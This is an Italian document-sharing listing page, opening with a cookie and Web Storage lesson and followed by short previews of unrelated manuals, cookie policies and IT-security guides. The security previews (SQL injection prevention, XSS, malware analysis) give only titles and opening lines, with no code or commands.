Cookie e Webstorage. Vediamo ora i metodi dell oggetto localstorage. Per memorizzare un valore si utilizza il metodo setitem:

Cookie e Webstorage. Vediamo ora i metodi dell oggetto localstorage. Per memorizzare un valore si utilizza il metodo setitem: Cookie e Webstorage Un cookie (letteralmente biscotto) è un pacchetto di informazioni che viene salvato sul computer dell utente. In successive sessioni di collegamento a Internet (normalmente per un periodo

Dettagli

Informativa estesa sull utilizzo dei cookie

Informativa estesa sull utilizzo dei cookie Informativa estesa sull utilizzo dei cookie che Gli OPTIMA utenti visiona S.R.L. vedranno le pagine utilizza inserite del i Cookie sito. delle per quantità rendere minime i propri informazioni servizi

Dettagli

PRODUZIONE PAGELLE IN FORMATO PDF

PRODUZIONE PAGELLE IN FORMATO PDF Requisiti minimi: PRODUZIONE, FIRMA E PUBBLICAZIONE DELLA PAGELLA ELETTRONICA CON ALUNNI WINDOWS PRODUZIONE PAGELLE IN FORMATO PDF Argo Alunni Windows aggiornato alla versione più recente. Adobe PDF CREATOR,

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

Dettagli

PEC. Posta Elettronica Certificata. securepec.com

PEC. Posta Elettronica Certificata. securepec.com PEC Posta Elettronica Certificata securepec.com SECUREPEC La nuova evoluzione nell invio di messaggi La Posta Elettronica Certificata (PEC) è l evoluzione della posta elettronica convenzionale. E la posta

Dettagli

Ambulatorio Virtuale Medinformatica Sistema On Line per richiedere Appuntamenti e Ricette

Ambulatorio Virtuale Medinformatica Sistema On Line per richiedere Appuntamenti e Ricette Ambulatorio Virtuale Medinformatica Sistema On Line per richiedere Appuntamenti e Ricette Egregio Dottore, Gentile Dottoressa, abbiamo il piacere di presentarle il nuovo sistema informatico per la gestione

Dettagli

LA GESTIONE DELLE VISITE CLIENTI VIA WEB

LA GESTIONE DELLE VISITE CLIENTI VIA WEB LA GESTIONE DELLE VISITE CLIENTI VIA WEB L applicazione realizzata ha lo scopo di consentire agli agenti l inserimento via web dei dati relativi alle visite effettuate alla clientela. I requisiti informatici

Dettagli

INFORMATIVA ESTESA SULL USO DEI COOKIE

INFORMATIVA ESTESA SULL USO DEI COOKIE INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cantiwinestyle.com o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di cantiwinestyle.com

Dettagli

Introduzione alla consultazione dei log tramite IceWarp Log Analyzer

Introduzione alla consultazione dei log tramite IceWarp Log Analyzer Introduzione alla consultazione dei log tramite IceWarp Log Analyzer L Analizzatore di Log è uno strumento che consente un'analisi statistica e logica dei file di log generati dal server. Lo strumento

Dettagli

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com 2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

TRASMISSIONE REPORTISTICA MENSILE. WEB SERVICE Descrizione procedura

TRASMISSIONE REPORTISTICA MENSILE. WEB SERVICE Descrizione procedura TRASMISSIONE REPORTISTICA MENSILE Indice 1. DESCRIZIONE... 3 2. METODI... 4 3. IL FILE XML... 6 3.1 Descrizione contenuti del file... 7 4. COME IMMETTERE I DATI SE NON CI SONO STATE VALUTAZIONI... 12 5.

Dettagli

ImporterONE Export Plugin Magento

ImporterONE Export Plugin Magento ImporterONE Export Plugin Magento Indice generale 1 INTRODUZIONE...2 2 INSTALLAZIONE DEL PLUGIN...2 3 CONFIGURAZIONE...4 4 OPERAZIONI PRELIMINARI...11 1-10 1 INTRODUZIONE Questo plugin di esportazione

Dettagli

Manuale Knowledge Base

Manuale Knowledge Base (Riservato a rivenditori e agenzie) Versione Luglio 2010 SOMMARIO Introduzione... 2 Accesso... 2 Menu Conoscenze... 3 Bacheca... 4 Voci di menu... 5 Ricerca... 5 Ricerca Semplice... 6 Ricerca avanzata...

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

PORTALE CLIENTI Manuale utente

PORTALE CLIENTI Manuale utente PORTALE CLIENTI Manuale utente Sommario 1. Accesso al portale 2. Home Page e login 3. Area riservata 4. Pagina dettaglio procedura 5. Pagina dettaglio programma 6. Installazione dei programmi Sistema operativo

Dettagli

Progetto di Ingegneria del Software 2. SWIMv2

Progetto di Ingegneria del Software 2. SWIMv2 Progetto di Ingegneria del Software 2 2012/2013 SWIMv2 Guida al Testing Docente: Prof. Luca Mottola Davide Brambilla Antonio Caputo Paolo Caputo 1 Indice 1 Introduzione 1.1 Materiale fornito................................

Dettagli

Express Import system

Express Import system Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

ENTRATEL: Servizio telematico Agenzia delle Entrate

ENTRATEL: Servizio telematico Agenzia delle Entrate ENTRATEL: Servizio telematico Agenzia delle Entrate Visualizzazione delle ricevute relative ai file inviati. Per controllare lo stato di elaborazione dei file inviati e per entrare in possesso delle ricevute

Dettagli

Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti

Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Risultati dell esame degli oggetti scaricati da BackDoor.Flashback sui Mac infetti Il 27 aprile 2012 Il team della società Doctor Web continua a esaminare la prima nella storia botnet di vasta scala creata

Dettagli

GUIDA AL SOCIAL CARE

GUIDA AL SOCIAL CARE 1 REGISTRAZIONE pag. 2 GESTIONE PROFILO pag. 3 GESTIONE APPUNTAMENTI pag. 4 GESTIONE PIANI DI CURA (RICHIESTA AUTORIZZAZIONE) pag. 5 INVIO DOCUMENTI A PRONTO CARE (es. FATTURE) pag. 6 LIQUIDAZIONI pag.

Dettagli

Che cosa è un VIRUS?

Che cosa è un VIRUS? Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo

Dettagli

Cookie Policy per www.lalocandadisettala.com

Cookie Policy per www.lalocandadisettala.com Policy per www.lalocandadisettala.com Uso dei cookie Il "Sito" (www.lalocandadisettala.com) utilizza i per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di www.lalocandadisettala.com.

Dettagli

MANUALE UTENTE Fiscali Free

MANUALE UTENTE Fiscali Free MANUALE UTENTE Fiscali Free Le informazioni contenute in questa pubblicazione sono soggette a modifiche da parte della ComputerNetRimini. Il software descritto in questa pubblicazione viene rilasciato

Dettagli

GUIDA UTENTE PRIMA NOTA SEMPLICE

GUIDA UTENTE PRIMA NOTA SEMPLICE GUIDA UTENTE PRIMA NOTA SEMPLICE (Vers. 2.0.0) Installazione... 2 Prima esecuzione... 5 Login... 6 Funzionalità... 7 Prima Nota... 8 Registrazione nuovo movimento... 10 Associazione di file all operazione...

Dettagli

Progetto ittorario Anno scol. 2013-2014

Progetto ittorario Anno scol. 2013-2014 PROGETTO ittorario Scopo: Creazione di una pagina web che mostri l orario di un docente, della classe della materia o dell aula a discrezione dell utente. Sviluppatori: Progetto sviluppato dalla classe

Dettagli

Gestione Automatizzata delle RDL

Gestione Automatizzata delle RDL Gestione Automatizzata delle RDL Tabella Revisioni [Version] STEFANO SPADARO [Manuale per il Tecnico] Manuale per il Tecnico per l apprendimento e l utilizzo del sito web per effettuare la compilazione

Dettagli

Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO

Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Sistema Informativo Gestione Fidelizzazione Clienti MANUALE D USO Login All apertura il programma controlla che sia stata effettuata la registrazione e in caso negativo viene visualizzato un messaggio.

Dettagli

Informatica per la comunicazione" - lezione 13 -

Informatica per la comunicazione - lezione 13 - Informatica per la comunicazione" - lezione 13 - Funzionamento di una password" 1: l utente tramite il suo browser richiede l accesso a una pagina del server; 2: il server richiede il nome utente e la

Dettagli

PULSANTI E PAGINE Sommario PULSANTI E PAGINE...1

PULSANTI E PAGINE Sommario PULSANTI E PAGINE...1 Pagina 1 Sommario...1 Apertura...2 Visualizzazioni...2 Elenco...2 Testo sul pulsante e altre informazioni...3 Comandi...3 Informazioni...4 Flow chart...5 Comandi...6 Pulsanti Principali e Pulsanti Dipendenti...6

Dettagli

Ata_NiAg02. Modulo Gestione Agenti

Ata_NiAg02. Modulo Gestione Agenti Ata_NiAg02 Modulo Gestione Agenti Il software NiAg02 consente alle aziende che utilizzano il software gestionale ATA di gestire in maniera totalmente automatizzata l acquisizione ordini e/o clienti dalla

Dettagli

Utilizzo della Intranet, forum privati Soci e Staff

Utilizzo della Intranet, forum privati Soci e Staff Utilizzo della Intranet, forum privati Soci e Staff Se durante la registrazione ad Associazioni Milano avete fatto richiesta del servizio denominato Intranet, questo sarà subito disponibile già a partire

Dettagli

Informativa ex art. 13 D.lgs. 196/2003

Informativa ex art. 13 D.lgs. 196/2003 Informativa ex art. 13 D.lgs. 196/2003 Gentile Utente, l Hotel Eurolido (di seguito, Società ) rispetta e tutela la Sua privacy. Ai sensi dell art. 13 del Codice della Privacy (d.lgs. 196 del 30 giugno

Dettagli

MINIGUIDA AI SERVIZI DI HOME BANKING

MINIGUIDA AI SERVIZI DI HOME BANKING MINIGUIDA AI SERVIZI DI HOME BANKING Come operare con la propria banca usando Internet Scopo del documento: la presente miniguida è rivolta a coloro che si affacciano per la prima volta al mondo dell Home

Dettagli

Guida Sintetica Portale Clienti Sportello

Guida Sintetica Portale Clienti Sportello Guida Sintetica Portale Clienti Sportello Benvenuto nel Portale Clienti Sportello Scopri come utilizzare il servizio dell Autorità che consente la gestione gratuita totalmente on-line delle richieste allo

Dettagli

Riepilogo delle modifiche di PA-DSS dalla versione 2.0 alla 3.0

Riepilogo delle modifiche di PA-DSS dalla versione 2.0 alla 3.0 Settore delle carte di pagamento (PCI) Standard di protezione dei dati per le applicazioni di pagamento () Riepilogo delle modifiche di dalla versione 2.0 alla 3.0 Novembre 2013 Introduzione Il presente

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie

Dettagli

L amministratore di dominio

L amministratore di dominio L amministratore di dominio Netbuilder consente ai suoi clienti di gestire autonomamente le caselle del proprio dominio nel rispetto dei vincoli contrattuali. Ciò è reso possibile dall esistenza di un

Dettagli

Sistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani

Sistema Gestionale FIPRO. Dott. Enea Belloni Ing. Andrea Montagnani Sistema Gestionale FIPRO Dott. Enea Belloni Ing. Andrea Montagnani Firenze, 29 Aprile 2010 Sommario della presentazione Il sistema informatico per la gestione progetti FIPRO L utente presentatore: diritti

Dettagli

SU Suap. IS357_03_01 Lettera aggiornamento SUAP vers. 02.00.00. Pagina 1 di 10

SU Suap. IS357_03_01 Lettera aggiornamento SUAP vers. 02.00.00. Pagina 1 di 10 SU Suap OGGETTO: aggiornamento della procedura Suap dalla versione 01.03.01 alla versione 02.00.00 Nell inviarvi quanto in oggetto Vi ricordiamo che gli aggiornamenti vanno effettuati tempestivamente e

Dettagli

Utilizzo dei Cookie Cosa sono i cookie? A cosa servono i cookie? cookie tecnici cookie, detti analitici cookie di profilazione

Utilizzo dei Cookie Cosa sono i cookie? A cosa servono i cookie? cookie tecnici cookie, detti analitici cookie di profilazione Utilizzo dei Cookie Questo sito utilizza i cookie. Utilizzando il nostro sito web l'utente accetta e acconsente all utilizzo dei cookie in conformità con i termini di uso dei cookie espressi in questo

Dettagli

Esercizio data base "Biblioteca"

Esercizio data base Biblioteca Rocco Sergi Esercizio data base "Biblioteca" Database 2: Biblioteca Testo dell esercizio Si vuole realizzare una base dati per la gestione di una biblioteca. La base dati conterrà tutte le informazioni

Dettagli

MODULO 5 Appunti ACCESS - Basi di dati

MODULO 5 Appunti ACCESS - Basi di dati MODULO 5 Appunti ACCESS - Basi di dati Lezione 1 www.mondopcnet.com Modulo 5 basi di dati Richiede che il candidato dimostri di possedere la conoscenza relativa ad alcuni concetti fondamentali sui database.

Dettagli

I cookie sono classificati in base alla durata e al sito che li ha impostati.

I cookie sono classificati in base alla durata e al sito che li ha impostati. 1. Informativa sui cookie 1.1. Informazioni sui cookie I siti Web si avvalgono di tecniche utili e intelligenti per aumentare la semplicità di utilizzo e rendere i siti più interessanti per ogni visitatore.

Dettagli

A tal fine il presente documento si compone di tre distinte sezioni:

A tal fine il presente documento si compone di tre distinte sezioni: Guida on-line all adempimento Questa guida vuole essere un supporto per le pubbliche amministrazioni, nella compilazione e nella successiva pubblicazione dei dati riguardanti i dirigenti sui siti istituzionali

Dettagli

Guida operativa. My Legal Corner. BestSoft SOFTWARE IN SANITÀ

Guida operativa. My Legal Corner. BestSoft SOFTWARE IN SANITÀ Guida operativa My Legal Corner BestSoft SOFTWARE IN SANITÀ Via Bono Cairoli 28/A - 20127 Milano (MI) Help desk: 02 29529140 Num. Verde da fisso: 800 978542 E-mail: info@bestsoft.it Sito Internet: www.bestsoft.it

Dettagli

VACANZE STUDIO - MANUALE UTENTE PER SOCIETÀ APPALTATRICI

VACANZE STUDIO - MANUALE UTENTE PER SOCIETÀ APPALTATRICI VACANZE STUDIO - MANUALE UTENTE PER SOCIETÀ APPALTATRICI INDICE pag. INTRODUZIONE... 3 STORIA DELLE MODIFICHE APPORTATE... 3 SCOPO DEL DOCUMENTO... 3 ABBREVIAZIONI... 3 APPLICATIVO COMPATIBILE CON INTERNET

Dettagli

Corso basi di dati Installazione e gestione di PWS

Corso basi di dati Installazione e gestione di PWS Corso basi di dati Installazione e gestione di PWS Gianluca Di Tomassi Email: ditomass@dia.uniroma3.it Università di Roma Tre Cosa è PWS? Il Personal Web Server altro non è che una versione ridotta del

Dettagli

ACCESSO AL SISTEMA HELIOS...

ACCESSO AL SISTEMA HELIOS... Manuale Utente (Gestione Formazione) Versione 2.0.2 SOMMARIO 1. PREMESSA... 3 2. ACCESSO AL SISTEMA HELIOS... 4 2.1. Pagina Iniziale... 6 3. CARICAMENTO ORE FORMAZIONE GENERALE... 9 3.1. RECUPERO MODELLO

Dettagli

Windows Web Server 2008 R2 64bit 1x Processore Intel Atom Dual (2x core 1.80 GHz) Dispositivo di memorizzazione flash esterno 32GB

Windows Web Server 2008 R2 64bit 1x Processore Intel Atom Dual (2x core 1.80 GHz) Dispositivo di memorizzazione flash esterno 32GB LabPro ver AC Servizio RAPPORTI DI PROVA ON-LINE (disponibile dalla ver. 6C-001) SERVIZIO RAPPORTI DI PROVA ON-LINE SERVIZIO RdP on-line MODULO Base Mette a disposizione dei clienti finali del laboratorio

Dettagli

Come funziona il WWW. Architettura client-server. Web: client-server. Il protocollo

Come funziona il WWW. Architettura client-server. Web: client-server. Il protocollo Come funziona il WWW Il funzionamento del World Wide Web non differisce molto da quello delle altre applicazioni Internet Anche in questo caso il sistema si basa su una interazione tra un computer client

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste

Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste Banca dati Professioniste in rete per le P.A. Guida all uso per le Professioniste versione 2.1 24/09/2015 aggiornamenti: 23-set-2015; 24-set-2015 Autore: Francesco Brunetta (http://www.francescobrunetta.it/)

Dettagli

2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine.

2.5. L'indirizzo IP identifica il computer di origine, il numero di porta invece identifica il processo di origine. ESERCIZIARIO Risposte ai quesiti: 2.1 Non sono necessarie modifiche. Il nuovo protocollo utilizzerà i servizi forniti da uno dei protocolli di livello trasporto. 2.2 Il server deve essere sempre in esecuzione

Dettagli

Integrazione InfiniteCRM - MailUp

Integrazione InfiniteCRM - MailUp Integrazione InfiniteCRM - MailUp La funzionalità della gestione delle campagne marketing di icrm è stata arricchita con la spedizione di email attraverso l integrazione con la piattaforma MailUp. Creando

Dettagli

SICUREZZA. Sistemi Operativi. Sicurezza

SICUREZZA. Sistemi Operativi. Sicurezza SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1

Sistemi Operativi SICUREZZA. Sistemi Operativi. D. Talia - UNICAL 14.1 SICUREZZA 14.1 Sicurezza Il Problema della Sicurezza Convalida Pericoli per i Programmi Pericoli per il Sistema Difendere i Sistemi Scoperta di Intrusioni Cifratura Esempio: Windows NT 14.2 Il Problema

Dettagli

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica

Consiglio regionale della Toscana. Regole per il corretto funzionamento della posta elettronica Consiglio regionale della Toscana Regole per il corretto funzionamento della posta elettronica A cura dell Ufficio Informatica Maggio 2006 Indice 1. Regole di utilizzo della posta elettronica... 3 2. Controllo

Dettagli

Outlook Plugin per VTECRM

Outlook Plugin per VTECRM Outlook Plugin per VTECRM MANUALE UTENTE Sommario Capitolo 1: Installazione e Login... 2 1 Requisiti di installazione... 2 2 Installazione... 3 3 Primo Login... 4 Capitolo 2: Lavorare con Outlook Plugin...

Dettagli

Che cos'è un modulo? pulsanti di opzione caselle di controllo caselle di riepilogo

Che cos'è un modulo? pulsanti di opzione caselle di controllo caselle di riepilogo Creazione di moduli Creazione di moduli Che cos'è un modulo? Un elenco di domande accompagnato da aree in cui è possibile scrivere le risposte, selezionare opzioni. Il modulo di un sito Web viene utilizzato

Dettagli

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE

ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE ATOLLO BACKUP GUIDA INSTALLAZIONE E CONFIGURAZIONE PREMESSA La presente guida è da considerarsi come aiuto per l utente per l installazione e configurazione di Atollo Backup. La guida non vuole approfondire

Dettagli

ImporterOne Manuale Export Plugin Prestashop

ImporterOne Manuale Export Plugin Prestashop ImporterOne Manuale Export Plugin Prestashop Indice generale 1 INTRODUZIONE...2 2 INSTALLAZIONE DEL PLUGIN...2 3 CONFIGURAZIONE...5 4 OPERAZIONI PRELIMINARI...11 1-10 1 INTRODUZIONE Questo plugin di esportazione

Dettagli

Manuale di utilizzo del sito ASUWEB

Manuale di utilizzo del sito ASUWEB Manuale di utilizzo del sito ASUWEB Versione 1.0 maggio 2007 1. Introduzione:... 3 2. Come registrarsi:... 3 3. I diversi livelli di abilitazione degli utenti:... 5 4. UTENTI IN SOLA LETTURA... 5 4.1.

Dettagli

La Guida Utente Luglio 2008

La Guida Utente Luglio 2008 La Guida Utente Luglio 2008 Indice 1. Il portale di e-learning e le modalità di accesso 3 2. Le principali funzioni 4 3. Il progetto formativo e i corsi 4 4. La comunicazione 7 2 1. Il portale di e-learning

Dettagli

Direzione Impresa, Lavoro e Scuola Area Produzione e Servizi - Agricoltura. Settore Calamità ed Avversità Naturali in Agricoltura

Direzione Impresa, Lavoro e Scuola Area Produzione e Servizi - Agricoltura. Settore Calamità ed Avversità Naturali in Agricoltura Pag. 1 di 15 Presentazione domanda iniziale e Comunicazioni Pag. 2 di 15 Sommario... 1 Dettaglio azienda... 3 Pratiche e Comunicazioni... 3 Nuova Domanda... 4 Dati identificativi... 5 Referente del Progetto...

Dettagli

Università degli Studi di Napoli Parthenope Facoltà di Scienze e Tecnologie Corso di Laurea in Informatica Generale

Università degli Studi di Napoli Parthenope Facoltà di Scienze e Tecnologie Corso di Laurea in Informatica Generale Università degli Studi di Napoli Parthenope Facoltà di Scienze e Tecnologie Corso di Laurea in Informatica Generale Progetto realizzato per l esame di Tecnologie Web Prof.:Raffaele Montella Studente: Vitiello

Dettagli

Marketing Portal. Guida all utilizzo per i concessionari. Maggio 2013

Marketing Portal. Guida all utilizzo per i concessionari. Maggio 2013 Marketing Portal Guida all utilizzo per i concessionari Maggio 2013 Marketing Portal Piaggio Il Marketing Portal Piaggio è la nuova area per la condivisione e messa a disposizione dei materiali di comunicazione

Dettagli

STAMPA DI UNA PAGINA SEMPLICE

STAMPA DI UNA PAGINA SEMPLICE Pagina 11 copiati nel proprio sistema (disco fisso o floppy). Questa operazione è detta download o scaricamento. Il modo più semplice per effettuare un download di un file (a meno che non sia specificato

Dettagli